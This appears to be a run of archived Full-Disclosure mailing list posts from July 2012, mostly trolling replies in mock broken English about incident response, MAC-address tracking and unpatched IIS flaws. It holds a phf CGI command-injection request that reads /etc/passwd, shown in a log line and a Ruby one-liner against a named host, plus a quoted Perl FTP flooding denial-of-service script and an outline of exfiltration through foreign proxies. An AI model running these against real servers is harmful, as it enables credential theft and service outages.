Re: [Full-disclosure] Linux - Indicators of compromise
On Fri, Jul 27, 2012 at 3:17 PM, Scott Solmonson wrote: > > Funny, I now want to watch Goldeneye for some reason... Funnier is now I want to watch Dumb and Dumber for obvious reason. > > > Everything you mention are parts of critical infrastructure. > Any organization/nation that claims to have its shit together will > have triple-redundancy, with complete isolation, and optimally > geographical dispersion in place, for said industries. > > Read again what I said: Triple redundancy? Is many company not even have single redundancy. You read too much sci-fi is please stop spread false information on list. List is filled with too many is noobs look to learn, not hear nonsense. Amazon, Twitter, Citibank, BofA and is many others all went down is this past week. All is companies has more money than God and is has competent CERTIFIED staff. Yet is they could not even is keep site up. Maybe is since you can, you can become CTO of is any one of these companies yes. > Your example of critical infrastructure confirms this. > It's better for banking transactions to no be made, versus for them to > go to the wrong account with the wrong amount. > It's better for a doctor to potentially have to make a quick judgement > call, versus giving the wrong procedure to the wrong patient. > It's better for the power plant to go down versus overspinning the > turbines, or shutting off the reactor cooling, and exploding or > melting down. Is better for banking transactions not to be made? Is this same for NASDAQ as this is transaction. No is better for business to CONTINUE - this is the C in BC (Business *CONTINUITY*). Transactions is can be audited on the fly. Doctor make wrong call? Speak and Spell. Is no one say anything about Doctor. Doctor would be too late. Go back and read is what was written. "if the patient alert system is affected" If patient cannot call Doctor or Nurse because help button is tampered with: Goodbye you are the weakest link" Exploding or melting down? Maybe perhaps is you watch too many time Die Hard. In is real environment, turbines and is other HMIs can be addressed by is taking *only* is that turbine and baselining-shifting-outsourcing-outpulsing power to other turbines *without* taking out the mid-west. Perhaps you is go back to work in real environment then come and try and is to test MusntLive. Is your comment show many much immaturity. Is MusntLive now pray your bosses not see these posts. > It's better for the airplanes to have to circle for a bit more versus > sending two on to the same runway at the same time. > etc. > etc. > etc Really? Is not better to send them to another *open* runaway versus is has them circle skies burning fuel, jamming up skies? *is grab popcorn - like DUmb and Dumber stupid movie* ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] DC
<%= question %> Is who is go want to meet and has is Stoli shots with MusntLive. MusntLive is stay at Bellagio and is scope everything under radar. Watch C Miller with eagle eye. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Thu, Jul 26, 2012 at 9:40 AM, wrote: > But unfortunately, you're right - most places have screwed up their DR > planning > and can't shut down. They've also screwed up their network config so it > isn't trivial > to track down which port a problem attacker is on. (And yes, tracking down a > miscreant at level 2/3 *is* trivial if your network is in fact properly > designed > and managed) Once upon is time people cry-- "no more free bugs" and is now MusntLive chant-- "no more is free security schooling!" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Wed, Jul 25, 2012 at 3:36 PM, Scott Solmonson wrote:
> I can't tell if I'm being trolled or not...
>
Inline is MusntLive's comments! MusntLive is now give you guys is some
free training on is Incident Response and is Forensics and is
CCD{A,P,E}. Is first MustnLive watch really good movie and is use
quote from is movie:
"Hello Scott. I want to play a game. So far what loosely could be
called security, you have made your postings rambling nonsense which
would make organizations like ISC2 and ISACA proud. Ramblings which
will shall now be shredded to bit. I call you unworthy of responding
to my posts. Of the chances you have been given, you have cherished
none. The packets in these posts are filled with information.
Information you do not seem to grasp. If you do not change your ways
and heed the information given to you, organizations like ISC2 and
ISACA will continue to pollute your brain. Your brain will close.
Think of this information like a venus flytrap. What you are looking
at right now is the information that can set you free. Do not heed
this information and security nonsense will swallow you whole.
Consuming your body into a herd of wandering security zombies. Each
with a title: CISSP, CISM, CISA, CEH." --- MusntLive is play security
Jigsaw
> Whatever layer-2 feats you've performed or will continue to perform,
> you're still very trackable and monitoring/blocking you at layer-3 is
> trivial.
Is so very trivial is how so many fester in networks globally
undetected. Yes MusntLive understand you are karate kid.
> Remote-to-machine or remote-to-network? Ultimately I can just say it
> again: Whatever layer-2 feats you've performed or continue to perform,
> you're still very trackable and monitoring/blocking you at layer-3 is
> trivial.
Monitoring and tracking on is any layer is trivial? How many is
enterprise networks is has you worked on.?
> You've figured it out- tap-port the entire switch's traffic, and then
> once you've got what you need, shut down every port. Once data
> integrity has been compromised, service downtime is almost always the
> lesser cost.
MusntLive is show you how you fail across many 'vertical' industries.
BANKING
---
Sample Bank's {N,S}OC is running 10 42Us is filled with servers. Seven
42Us is filled with 1U servers. One 42U is Oracle M9000, one 42U is
has QFX3000M fully populated (6,144 10GbE ports) one 42U is has take
your pick, EX, Cat, BigIron. MusntLive is compromise a 1U somewhere on
a 42U. All racks is run the bank's business. MusntLive broadcast to
all on network.
You call Gigamon and buy your G-TAP to watch me. Once you "got what
you need, you shut down every port" is you say. Really? Shut all ports
down? "Integrity is compromised, service downtime" (DR/BCP nonsense).
Now what? You still is not find me.
Because each 1U is kind of is new, you now need to figure out is what
happened where. Each 1U is has half TB data. You now need image these
1Us for your investigation. Is remember is bank you need report to
clients as is they have credit card transaction. Forget is fact your
bank is will lose more money more you have downtime. Have you is done
your homework. What is your estimated MTTR? (CCDP term for you is
learn this afternoon).
I think Scott you work on network where is has at max 5 Cat 2950s as
is your statement not valid even is remotely in the banking industry.
HEALTHCARE
---
Sample Hospitals {S,N}OC is has 1 42U. Is five racks has 48 port
switch, 10 has 2U servers and is each server has 4 network ports. You
has firewalls, SSL appliances, DB and is special server to link to
room so is when patients ring emergency bell, nurses come running is
like flock of seagull (and I ran, ran so far away). You will shut down
all is switchport here now too also?
MusntLive is not go further into your nonsense reply.
SCADA
---
Sample hydroelectrical plant...
Really? Shut down all ports?
Sample gas plant...
Really? Shut down all ports?
MIL/GOV
---
Sample USCYBERCOM
Really? Shut down is Pentagon?
Sample IC.FBI.GOV
Really? Shut down is entire racks? Because you will have
backup/standby entire 42Us?
MusntLive chuckle. Is you has not even answer "how you will find me"
is you really think pulling plug is save you. Lets make believe is
your plan work. You pull plug on all ports (shut them down is what you
say). Now comes fun stuff!
You call up DigitalIntelligence. Even in is small hospital you is has
to image 10 drives (small disks remember MusntLive is say half TB).
5TB to image because since is your rack is infected, you must image to
retain forensically sound is evidence. After you call the company
DigitalIntelligence, they have is fastest network based imaging
system. 6.6Gb a minute.
MusntLive make believe DigitalIntelligence make delivery in 1hr and
you can is start imaging! How much downtime is passed before your
imaging is done? Don't worry you can is tell patients, surgeons, ER
room: "se
Re: [Full-disclosure] Linux - Indicators of compromise
On Wed, Jul 25, 2012 at 7:04 AM, Giles Coochey wrote: > On 18/07/2012 13:10, Григорий Братислава wrote: > If you broadcast using a MAC address you are on the same subnet, layer 2. > > On a wired network I don't really care whether you spoofed your mac address > or not, you still registered the mac address on the switch, and I can see > what port you connected to. Then I just need to follow the cable to find > you. > > In any case, this is an internal intrusion or post-exploitation issue we're > talking about, not an external one, assuming the layer-2 environment has a > modicum of protection. MusntLive is now beg of you is to allow me to is join your groupstudy! MusntLive is live on the edge of assumption! In is case of internal/post-exploitation is reality of matter is you will not find me. You can is assume you will but we all is know where assume lead (http://www.youtube.com/watch?v=6hrLj8QEAgI) Is I am on your network, good luck is find me especially in is post exploitation as I am is liable to float around is piggyback from one machine is to the next. You can is assume all you want about port security in is in fact, utterly worthless in post exploitation as is likely I am not even in your physical network. Please is go back to CCNA studies and is stop bastardize is something you know a ''modicum'' of is about. You fail is off jump with word 'assume' So let us is go back to the beginning since you is fail to understand. Pay is close attention for you is not learn this with Lammle. 1) MusntLive is perform remote exploit and is get on your machine 2) MusntLive exploits is "other" machines and send broadcast via spoofing on "OTHER" compromised machines 3) MusntLive is listen for broadcast on any compromised machine You is expect to track me how? Everyone is listen. Is you can go narrow down who is broadcast. Even turn of port! I am is still listen and is will still start again. What is it you is think you will do? Shut down all ports everywhere? Is maybe BCP filter? URPF? Is you think so, you is definitely need lay off Lammle and is read Oppenheimer, Baker, and is too many others you is obviously not ready for. MusntLive like this game. Now you come back and is counter, then I come is back and is counter you to smitheruskis! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] About IBM: results
On Thu, Jul 19, 2012 at 9:31 AM, MustLive wrote: > - During 16.05-20.05 I've wrote five advisories via contact form at IBM > site. No reaction from "IT security". > - At 20.05 I've contacted "Software support". Received formal answer. > - At 20.05 informed support, that this is security issues (not something > small, which they can just ignore) and they need to sent it to security > department. Again received formal answer - this time with "call me maybe" > paragraph :-). In result IBM employees just ignored. > - At 30.05, after recommendation from the list to contact directly, I've > contacted IBM PSIRT directly. They said they didn't received anything, not > from me via contact form, nor from support. The same as they didn't do > anything (no security audit of their software) to make this multiple > vulnerabilities in multiple IBM software to go to the wild. > - At 31.05 I've resend five advisories, which they received and said they > would send them to the developers (of Lotus products). > - At 06.06, after silence from PSIRT, I've reminded them. They said there is > still no info from developers, so wait please (until they will format their > brains to work faster). > - At 10.07, after more then month of silence since last time from PSIRT, > I've reminded them. No answer from them. This looks like IBM developers have > decided to ignore these vulnerabilities. > - At 14.07 I've informed IBM PSIRT, that due to their ignoring I'd plan > public disclosure of these vulnerabilities on July. > - At 18.07, 12:06 AM, PSIRT answered (after 1,5 months of silence) and said > that previous day they had meeting with developers, which were working on > these issues, and they started to fix them. No concrete deadline, they just > started (and I'll be informed about the date, the same as they told me at > 31.05). OK, let's give them more time. Maybe IBM is see who you are and is just chuckle because none of your advisories is ever worth anything? Perhaps is maybe yes, IBM is read through BS, nonsense, BSnonsense, NonsenseBS? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Anonymous/iWot] Somaleaks !!!
On Thu, Jul 19, 2012 at 9:53 AM, wrote: > Cool story, bro. Too bad you're going after terrorists rather than the *real* > threat to our society - those who are destroying our civil liberties and way > of > life in the name of "protecting us from terrorists". In US, there is what is called is NRA no. Is same argument you make: Guns is not kill people - - - Is safe to say: Don't is go after gun owners, go after bullet maker? (http://www.hornady.com/ammunition/zombiemax/)? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Wed, Jul 18, 2012 at 12:20 PM, Scott Solmonson wrote: > Shortcutting other responses- > 2) assume the worst, don't isolate, monitor spread tactics, > perceptually contain and then analyse. This is make sense! Do not isolate. Let hacker run rampant in is your network. Because if they is damage your network in is process of not isolating them, is ok if they is steal and delete. You get to see what is they stole after is gone, and after they is wipe your system. This is good advice yes, help test your BC/DR! MusntLive like absurd and obscure approach! > Endgame is always close the hole, restore the data, learn from your > mistakes that allowed it to happen :) MusntLive is love your advice! According to you: 1) Let hacker run amok so you can see them is run amok 2) Once hacker is run amok, steal your bread and is butter, wipe your systems, restore 3) Go back and is learn why they steal and delete. MusntLive think answer for #3) is logic one: "Idiot admin allowed is this to happen" ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Wed, Jul 18, 2012 at 8:30 AM, alex wrote: > Source MAC faking would result in switchport shutdown in some environments. > Further you cannot communicate with outside world using broadcasts. > ICMP payloads is quite common and hard to detect. > > Me study CISSP, too. Already CCNA Security. CCNA not worth the money. Better > get CISA/CISM. > > You miss point. If I sent data to broadcast, original poster is say: "I will know who you are via MAC address" to which I say: "You is need to go back to Cisco bootcamp" Everyone is receive broadcast, no way for him to detect who I am since I am is not alone in receiving the broadcast. Needle in is haystack. Second, ICMP tunneling, GRE tunneling is too much trouble. Advanced Persistent Threats as defined by (is now give North Korean title to him) Super Grand Master of the Internet Universe Richard Bejtlich as advanced and is persistent. But is also stupid and lazy. Will not waste time on this is vector. Will use SSL and HTTP to is stay under radar. Attacker >>> Own is your data >>> post data in $WBEDIR >>> visit $WEBDIR using proxy [small packets] Is how else can attacker download 867 terabytes of data (http://www.eddupdate.com/2012/02/cyberthieves-stole-867-terabytes-in-2011.html)? You believe attackers is using FTP, ICMP, GRE tunnels? No. Too noisy is this. Better to visit website like everyone else use proxy of another country, this is country take blame. MusntLive >>> use is never use 213.24.76.77 address >>> use proxy 210.75.193.49 >>> download data \ Supreme Grand Master of Internet Universe >>> analyze >>> see proxy >>> chant APT APT APT >>> See I told you is China \ Fox News >>> report on Chinese threat \ MusntLive >>> facepalm at report and go back is drink Stoli CISA/CISM is have nothing on InfoSecInstitute! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Wed, Jul 18, 2012 at 3:18 AM, Giles Coochey wrote: >> Is you have much more to worry than is ICMP/GRE tunnels. Is I send to >> Broadcast and I am is on your network, how do you is plan to pinpoint >> who I am when is everyone see broadcast > > By your source MAC address > > > -- > Regards, Really? I am so glad your company is has you for security. So a message is broadcast to everyone. Everyone on say is /21 is listen and you is going to pick me out, out of is everyone else who is listen? Genius! Nobel Prize A+++ number one is seller! Is not only is idea you mention genius, is good that no one can is change their MAC address! Is proof MusntLive must go back is study CISSP and now is CCNA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Mon, Jul 16, 2012 at 10:35 AM, Giles Coochey wrote: > On 16/07/2012 14:48, Gary Baribault wrote: > > I suggest one of the first answers was the good one, intercept the traffic > routed to the internet with TCPDump. Filter out the normal traffic and see > what's left. All compromised systems talk to the Internet to dump data or > route spam. Be patient, some systems talk all the time, some once an hour .. > but you will find some unexplained traffic. Once you do find that you're > infected, don't bother cleaning up the system, format and restore the data! > Is you have much more to worry than is ICMP/GRE tunnels. Is I send to Broadcast and I am is on your network, how do you is plan to pinpoint who I am when is everyone see broadcast ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
Again is worth to repeat: MusntLive is serious security researcher. Is you have been round block is long enough, is clues let you know is how I am is real deal. Is joke on skiddies is like yourself is you not discover this. MusntLive go back to dirty days of TYM and Well but your is not ready. On Tue, Jul 17, 2012 at 1:47 PM, NETT Dave wrote: > Oh and see his posts, he also likes to suck Thor balls. Who knows why. > > > From: NETT Dave > To: Gage Bystrom ; Григорий Братислава > ; "full-disclosure@lists.grok.org.uk" > > Sent: Tuesday, July 17, 2012 7:43 PM > > Subject: Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft > July Security Bulletin > > Musntlive has never been funny. Just another bored teen who found the FD > address in "Hackers Handbook for Dummies". > > ____ > From: Gage Bystrom > To: Григорий Братислава ; > "full-disclosure@lists.grok.org.uk" > Sent: Tuesday, July 17, 2012 7:30 PM > Subject: Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft > July Security Bulletin > > /*PoC*/ > Sorry no automated code yet :( can verify manually as follows: > Read musntlive's post. If it is similar to multiple previous posts check if > still funny. > Notice how you get a return value of nope. > /EoF > I can haz CVE now :(? > On Jul 17, 2012 10:10 AM, "Григорий Братислава" wrote: > > And you can is prove this theory is how? > > On Tue, Jul 17, 2012 at 1:09 PM, Gage Bystrom > wrote: >> Hello Full Disclosure! I is warn you about musntlive! >> >> He is use old joke over over again. Not funny! >> > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > > -- `Wherever I is go - there am I routed` ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Tue, Jul 17, 2012 at 1:43 PM, NETT Dave wrote: > Musntlive has never been funny. Just another bored teen who found the FD > address in "Hackers Handbook for Dummies". MusntLive is serious security researcher. Everyone who is read between is line this is evident. Is for those like you who is respond who joke is on see? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
And you can is prove this theory is how? On Tue, Jul 17, 2012 at 1:09 PM, Gage Bystrom wrote: > Hello Full Disclosure! I is warn you about musntlive! > > He is use old joke over over again. Not funny! > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Tue, Jul 17, 2012 at 10:11 AM, king cope
wrote:
> Hello Jan,
> I did some additional tests for the IIS bugs.
>
> * IIS 6.0 PHP authentication bypass is only possible on Windows Server
> 2003 SP1. SP2 seems unaffected
> So take that bug as resolved, my mistake as I didn't have a fully
> patched system online when testing.
kingcope are we is release advisories to patched software? Is so, then
I introduce exploit along with you.
Hello full disclosure!! !! !!
Is like to warn you about phf vulnerability. Is hackers can get your
password list in is unpatched server.
PoC on is my system:
213.24.76.77 - - [17/July/2012:23:17:47 -0700] "GET
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd HTTP/1.0" 500 -
In Ruby (here we is own rsnake):
require 'open-uri'
open('http://www.webfringe.org/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
HTTP/1.0'){ |f| print f.read }
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Tue, Jul 17, 2012 at 6:44 AM, Jan Reilink wrote: > I can't reproduce authentication bypass vulnerabilities you mention. > Also, there is more than one way to password protect a directory. Did > you disable 'anonymous authentication' in IIS 6.0/7.5, or did you remove > or deny IUSR-user NTFS permissions on the file system? > Is this silly question! Of course he is not remove and is deny permissions. Then he is not can make vulnerability disclosure. If is I leave my door open then I am is vulnerable to robber is take my family jewels. I can is go to congress and pitch law for stand my ground. If I is lock my door, I has nothing to say. Hello full disclosure!! !! !! MusntLive is like to warn you about disclosure-via-brownie-get-is-your-name-polluted-intouseless-cve-advisory-politics... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
LE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT',
> 'HELP','MODE','APPE','STRU','SITE','SITE INDEX',
> 'TYPE','TYPE A','TYPE E','TYPE L','TYPE I','NLST','CWD',
> 'STOR','RETR','MKD','RMD', 'DELE','RNFR','RNTO','LIST','MDTM',
> 'SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
> INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE I',
> 'NLST','CWD','STOR','RETR','MKD','RMD',
> 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE',
> 'STRU','SITE','SITE INDEX','TYPE','TYPE A','TYPE E','TYPE L','TYPE
> I','NLST','CWD','STOR','RETR','MKD','RMD','DELE',
> 'RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP','MODE','APPE','STRU','SITE','SITE
> INDEX','TYPE','TYPE A','TYPE E',
> 'TYPE L','TYPE I','NLST','CWD','STOR','RETR','MKD','RMD',
> 'DELE','RNFR','RNTO','LIST','MDTM','SIZE','STAT','ACCT','HELP',
> 'MODE','APPE','STRU','SITE','SITE INDEX','TYPE','TYPE A',
> );
> print "Dosing Server!\n";
> $pm = new Parallel::ForkManager(40);
> while (1) {
> my $pid = $pm->start and next;
>COMMAND_LIST: foreach $cmd (@command){
> foreach $poc (@junk){
> LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
> PeerPort=>$port, Proto=>'tcp', Timeout=>30);
> if(defined($sock4)){
> $sock4->send("$cmd"." "."$poc\r\n", 0);
> $sock4->recv($content, 100, 0);
> }
> }
> }
> $pm->finish;
> }
>
>
> On Mon, Jul 16, 2012 at 11:54 AM, Григорий Братислава
> wrote:
>> On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami
>> wrote:
>>> Hello list
>>> in my testing environment (IIS 6 with php5 ) the flaw exist . i
>>> think i got da move to XAMPP MS wont patch it LOL
>>>
>>
>>
>> Test environment is not production environment. Is place your test
>> server in your production network and is send me information for to
>> test.
--
`Wherever I is go - there am I routed`
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 2:50 PM, kaveh ghaemmaghami wrote: > Hello list > in my testing environment (IIS 6 with php5 ) the flaw exist . i > think i got da move to XAMPP MS wont patch it LOL > Test environment is not production environment. Is place your test server in your production network and is send me information for to test. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 2:20 PM, king cope wrote: > Don't feed the trolls :D > btw it's real, it's not my fault you don't understand. > consult the attachment MusntLive is no troll. Is question to be asked. If is tree fall on top of you in if forest, believe you is me, is no matter is you hear it. MusntLive is work in ultra compartmentislized environment. Attachment is strip. Is can you please send in emacs format? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linux - Indicators of compromise
On Sat, Jul 14, 2012 at 8:46 AM, Ali Varshovi wrote: > Greetings FD, > > Does anyone have any guidelines/useful material on analysis logs of a Linux > machine to detect signs of compromise? The data collection piece is not a > challenge as a lot of useful information can be captured using commands and > some scripts. I'm wondering if there is any systematic approach to analyze > the collected logs? Most of the materials I've seen are more aligned to > malware and rootkit detection which is not the only concern apparently. > > Thanks, > Ali Is in my experience is that I place two folders in directory in is root folder called /root/MilaKunisLeakedPhotos/ and /root/OlgaKurlyenko/ is when I see is accessed. Then I know is my machine compromised. Everyone is want see Olga and Mila ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 1:54 PM, Thor (Hammer of God) wrote: > Right - if you've compromised the server to the point you can alter > directory structures/names, the you've already bypassed the ACLs required > in order to "exploit" the vulnerability that allows you to bypass the > ACLs. I don't get it. > > t Please forgive him. Is only kingcope. For minute he is go loon and is this evident as is he not breaking BSD. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unpatched IIS Vulnerabilities / Microsoft July Security Bulletin
On Mon, Jul 16, 2012 at 1:24 PM, king cope wrote: > Hi Lists, > > it seems Microsoft doesn't want to patch the vulnerabilities I posted > back in June, > at least not in the July update. > Hello Full Disclosure!! !! !! Is like to introduce you to Schrödinger's Cat and Wigner's Friend in is Computer Security. 'The Wigner's Friend thought experiment posits a friend of Wigner who performs the Schrödinger's cat experiment after Wigner leaves the laboratory. Only when he returns does Wigner learn the result of the experiment from his friend, that is, whether the cat is alive or dead. The question is raised: was the state of the system a superposition of "dead cat/sad friend" and "live cat/happy friend," only determined when Wigner learned the result of the experiment, or was it determined at some previous point?' http://en.wikipedia.org/wiki/Wigner's_friend http://en.wikipedia.org/wiki/Schr%C3%B6dinger%27s_cat IIS is neither vulnerable or not vulnerable. Is until you is exploit it and verify! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 0x00: MustntLive not he is robot.
On Fri, Jul 13, 2012 at 8:35 AM, Fatherlaptop wrote: > No...more like Yoda. > Is Yoda you mean is from Star Wars? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
On Fri, Jul 13, 2012 at 7:23 AM, Gokhan Muharremoglu wrote: > Ok. It seems i have to explain this vulnerability's effects with another > scenario. > > This is a real life scenario and i wrote it in a Turkish article for > National Information Security Portal which is run by TUBITAK. > > Article in Turkish with scenario => > http://www.iosec.org/oturum_oncesi_tanimli_cerez.pdf > > I will explain it in English now. > > There are KIOSK/Terminal machines at bank branches in Turkey. Customers can > reach to the regular Internet banking applicaton from here. This is real life common sense is answer. "So you walk into a bank" are you is serious? Is most stupid example than Security Chicken Tim. I am is walk into bank to do this stupidity while I am on is camera? Where are you is new 10 year and is under experience security freaks come is from? Hello Full Disclosure!! !! !! Is like to warn you about is robbing banks without is mask and waving to camera pizda ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
PS (is excuse my manner) is no take my message about your is nonsense personal Tim. MusntLive is most respect Chicken Soldiers and Soldier Chickens. MusntLive is never discriminate even is against poultry. MusntLive is support PETA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
On 7/13/2012 12:07 PM, Tim wrote: > Suppose an application runs solely over HTTPS and assigns cookies > with the secure flag. However, user sessions are assigned before > login and they don't refresh their session cookies upon user login. > In this case, users are still vulnerable to MitM: This nonsense you waste your time is write is not a cause for concern. Simply because of is use of the word "suppose." Suppose is aliens visited us. Suppose is Elvis was alive. Suppose is the tooth fairy visited you. Too many is variables to deal with. > 1. An attacker gains access to view and modify unencrypted traffic > between a user and the application. In is most cases of malware and trojans a) bad-executables is tend to install keyloggers anyway so is credentials are stolen b) MITM is too complex and is time consumer of attack for financialisly related organized crime groups. You think they is patient?. Why bother MITM when keystroke loggers work fine. c) MITM is pointless when is screenshots accompany keystroke logging d) Storing information is to decrypt later takes up more space than necessary. More is space is raise likelihood of detection. MusntLiv is deleted 2,3,4 nonsense you is write: TL;DR;TMN (Too Much Nonsense) > 5. Upon attempting to access the HTTP version of the vulnerable > application (which of course doesn't exist), the attacker again > intercepts this and replaces the HTTP response. In this response, a > Set-Cookie header is included which provides the victim's browser with > the application session that the attacker retrieved in step 2. Malware organizations is re-use tried, and true methods that work over, and is over. Your's whole message to this list is based on theory. Deleting 7, 8 TL;DR;TMN > This is complicated, but it's not that much more complicated than what > existing MitM tools, such as sslstrip, already do. You is have been reading too many documents on InfoSecInstitute. I suggest you is go analyze the top 20 crimepacks and you is will see that is easier for criminals to get data without is using MITM attacks. MITM is now become poster boy hacker talk meant to prop FUD. "OMG you could be the potential victim of a possible MITM attack. This is why http://writingdead.com/wp-content/uploads/2011/03/chaos-math-pic.gif"; > Note that another variant of this attack is possible if the victim's > browser silently accepts third-party cookies (which most do by > default) and is able to convince a user to visit any malicious site. > In this case, no MitM is necessary. Note for is yourself - 'anything is possible, this is life' > Using HTTP cookies for session authentication is, and always has been, > a bad idea. They are simply not designed for this application. We > need something better. Why worry is about cookies? MusntLive solve this for you right now: http://tinyurl.com/MITM-cookie-solution ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
On Fri, Jul 13, 2012 at 10:44 AM, Benji wrote: > Come to Europe, we show you how to party@#! Is that is what Greeks and Spaniards call this behaviour? Is funny, to me is similar to riot. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Predefined Post Authentication Session ID Vulnerability
On Thu, Jul 12, 2012 at 9:15 AM, wrote: > Benji, > > Do you write anything but scathing criticism? I've never seen you > contribute anything of use to this list. You must be a real pleasure in > person. > s#ritney#enji#g http://www.youtube.com/watch?v=kHmvkRoEowc ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)
On Thu, Jul 12, 2012 at 1:11 PM, wrote: > There's a number of attacks using the MTRR and IOMMU to cause the CPU to have > a > different view of memory. It is indeed possible for something to be sitting > in > memory but not be visible to *you* (while still being visible to something > that > didn't expect it to be visible, and thus delivering an exploit). > No! Only is Ptacek and Joanna know about these is attacks. Red pill, blue pill, rainbow pill. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Full-Disclosure Digest, Vol 89, Issue 15 suspicion of rootkit (Alexandru Balan)
